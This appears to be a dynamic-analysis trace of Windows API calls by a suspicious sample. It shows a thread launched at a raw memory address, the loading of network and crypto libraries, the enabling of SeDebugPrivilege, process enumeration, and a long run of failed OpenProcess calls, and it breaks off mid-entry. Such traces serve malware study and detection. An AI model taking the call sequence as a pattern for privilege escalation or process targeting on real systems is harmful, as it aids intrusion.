0x680000 [0088.107] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x680000, lpParameter=0xcf2d0, dwCreationFlags=0x0, lpThreadId=0xcf2c4 | out: lpThreadId=0xcf2c4*=0x9fc) returned 0xa8 [0088.108] Sleep (dwMilliseconds=0x2710) [0098.145] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="WINHTTP.dll", BaseAddress=0xcecf8 | out: BaseAddress=0xcecf8*=0x7ffb21040000) returned 0x0 [0098.507] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="SHLWAPI.dll", BaseAddress=0xcecf8 | out: BaseAddress=0xcecf8*=0x7ffb262e0000) returned 0x0 [0100.972] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="CRYPT32.dll", BaseAddress=0xcecf8 | out: BaseAddress=0xcecf8*=0x7ffb253c0000) returned 0x0 [0100.985] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="USER32.dll", BaseAddress=0xcecf8 | out: BaseAddress=0xcecf8*=0x7ffb26090000) returned 0x0 [0100.986] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="ADVAPI32.dll", BaseAddress=0xcecf8 | out: BaseAddress=0xcecf8*=0x7ffb28a50000) returned 0x0 [0100.986] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="IPHLPAPI.DLL", BaseAddress=0xcecf8 | out: BaseAddress=0xcecf8*=0x7ffb1dd60000) returned 0x0 [0100.990] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="WS2_32.dll", BaseAddress=0xcecf8 | out: BaseAddress=0xcecf8*=0x7ffb28450000) returned 0x0 [0101.002] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="OLEAUT32.dll", BaseAddress=0xcecf8 | out: BaseAddress=0xcecf8*=0x7ffb288f0000) returned 0x0 [0101.002] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="bcrypt.dll", BaseAddress=0xcecf8 | out: BaseAddress=0xcecf8*=0x7ffb24fb0000) returned 0x0 [0101.006] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="ncrypt.dll", BaseAddress=0xcecf8 | out: BaseAddress=0xcecf8*=0x7ffb24c90000) returned 0x0 [0101.013] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="USERENV.dll", BaseAddress=0xcecf8 | out: BaseAddress=0xcecf8*=0x7ffb24880000) returned 0x0 [0101.021] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="ole32.dll", BaseAddress=0xcecf8 | out: BaseAddress=0xcecf8*=0x7ffb281e0000) returned 0x0 [0101.031] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="api-ms-win-core-com-l1-1-0.dll", BaseAddress=0xce5e8 | out: BaseAddress=0xce5e8*=0x7ffb27e00000) returned 0x0 [0101.031] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="api-ms-win-core-com-l1-1-0.dll", BaseAddress=0xce5e8 | out: BaseAddress=0xce5e8*=0x7ffb27e00000) returned 0x0 [0101.032] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="api-ms-win-core-com-l1-1-0.dll", BaseAddress=0xce5e8 | out: BaseAddress=0xce5e8*=0x7ffb27e00000) returned 0x0 [0101.032] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="api-ms-win-core-com-l1-1-0.dll", BaseAddress=0xce5e8 | out: BaseAddress=0xce5e8*=0x7ffb27e00000) returned 0x0 [0101.032] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="api-ms-win-core-com-l1-1-0.dll", BaseAddress=0xce5e8 | out: BaseAddress=0xce5e8*=0x7ffb27e00000) returned 0x0 [0101.032] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="SHELL32.dll", BaseAddress=0xcecf8 | out: BaseAddress=0xcecf8*=0x7ffb267e0000) returned 0x0 [0105.379] SetTimer (hWnd=0x0, nIDEvent=0x0, uElapse=0x1388, lpTimerFunc=0x0) returned 0x7f7c [0105.380] GetMessageA (in: lpMsg=0xcef90, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xcef90) returned 1 [0110.379] RtlAddVectoredExceptionHandler (FirstHandler=0x0, VectoredHandler=0x11c920) returned 0x710e30 [0110.383] HeapCreate (flOptions=0x0, dwInitialSize=0x30d40000, dwMaximumSize=0x0) returned 0x2150000 [0112.993] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e40830 [0113.005] GetWindowsDirectoryW (in: lpBuffer=0xce740, uSize=0x208 | out: lpBuffer="C:\\Windows") returned 0xa [0113.005] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0xce72c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xce72c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0113.014] GetCurrentProcess () returned 0xffffffffffffffff [0113.015] GetTickCount () returned 0xe8628a [0113.016] GetTickCount () returned 0xe8628a [0113.017] GetCurrentProcess () returned 0xffffffffffffffff [0113.017] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0xce810 | out: TokenHandle=0xce810*=0x198) returned 1 [0113.018] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xce828 | out: lpLuid=0xce828*(LowPart=0x14, HighPart=0)) returned 1 [0113.029] AdjustTokenPrivileges (in: TokenHandle=0x198, DisableAllPrivileges=0, NewState=0xce818*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0113.029] CloseHandle (hObject=0x198) returned 1 [0113.029] GetTickCount () returned 0xe86299 [0113.029] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x40000) returned 0x32e40850 [0113.032] NtQuerySystemInformation (in: SystemInformationClass=0x10, SystemInformation=0x32e40850, Length=0x40000, ResultLength=0xce8dc | out: SystemInformation=0x32e40850, ResultLength=0xce8dc*=0x8abd8) returned 0xc0000004 [0113.058] GetTickCount () returned 0xe862b9 [0113.058] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e40850, Size=0x90000) returned 0x32d41720 [0113.063] NtQuerySystemInformation (in: SystemInformationClass=0x10, SystemInformation=0x32d41720, Length=0x90000, ResultLength=0xce8dc | out: SystemInformation=0x32d41720, ResultLength=0xce8dc*=0x8abd8) returned 0x0 [0113.082] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.082] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.082] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.082] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.082] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.082] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.082] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.082] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.082] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.083] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.083] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.083] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.083] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.083] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.083] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.083] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.083] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.083] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.083] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.083] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.083] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.083] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.083] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.083] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.083] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.083] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.083] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.083] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.083] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.083] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.083] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.083] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.083] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.083] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.083] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.083] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.083] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.083] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.083] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.083] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.083] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.083] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.083] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.083] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.083] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.084] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.084] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.084] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.084] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x130) returned 0x0 [0113.084] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.084] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.084] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.084] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.084] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.084] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.084] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.084] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.084] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.084] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.084] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.084] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.084] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.084] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.084] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.084] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.084] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.084] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.084] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.084] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.084] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.084] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.084] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.084] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.084] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.084] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.084] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.084] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.084] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.084] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.084] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.084] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.084] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.085] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.085] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.085] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.085] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.085] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.085] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.085] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.085] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.085] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.085] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.085] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.085] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.085] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.085] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.085] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.085] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.085] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.085] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.085] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.085] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.085] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.085] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.085] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.085] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.085] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.085] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.085] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.085] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.085] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.085] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.085] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.085] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.085] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.085] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.085] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.086] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.086] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.086] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.086] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.086] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.086] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.086] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.086] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.086] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.086] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.086] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.086] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.086] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.086] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.086] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.086] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.086] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.086] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.086] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.086] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.086] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.086] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.086] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.086] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.086] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.086] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.086] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.086] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.086] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.086] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.086] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.086] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.086] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.086] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.087] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.087] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.087] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.087] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.087] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.087] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.087] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.087] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.087] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.087] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.087] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.087] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.087] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.087] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.087] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.087] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.087] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.087] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.087] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.087] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.087] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.087] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.087] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.087] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.087] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.087] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.087] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.087] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.087] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.087] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.087] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.087] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.087] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.087] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.087] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.087] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.088] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.089] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.089] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.089] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.089] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.089] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.089] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.089] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.089] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.089] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.089] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.089] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.089] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.089] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.089] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.089] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.089] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.089] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.089] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.089] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.089] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0113.089] OpenProcess (dwDesiredAccess=0x40, 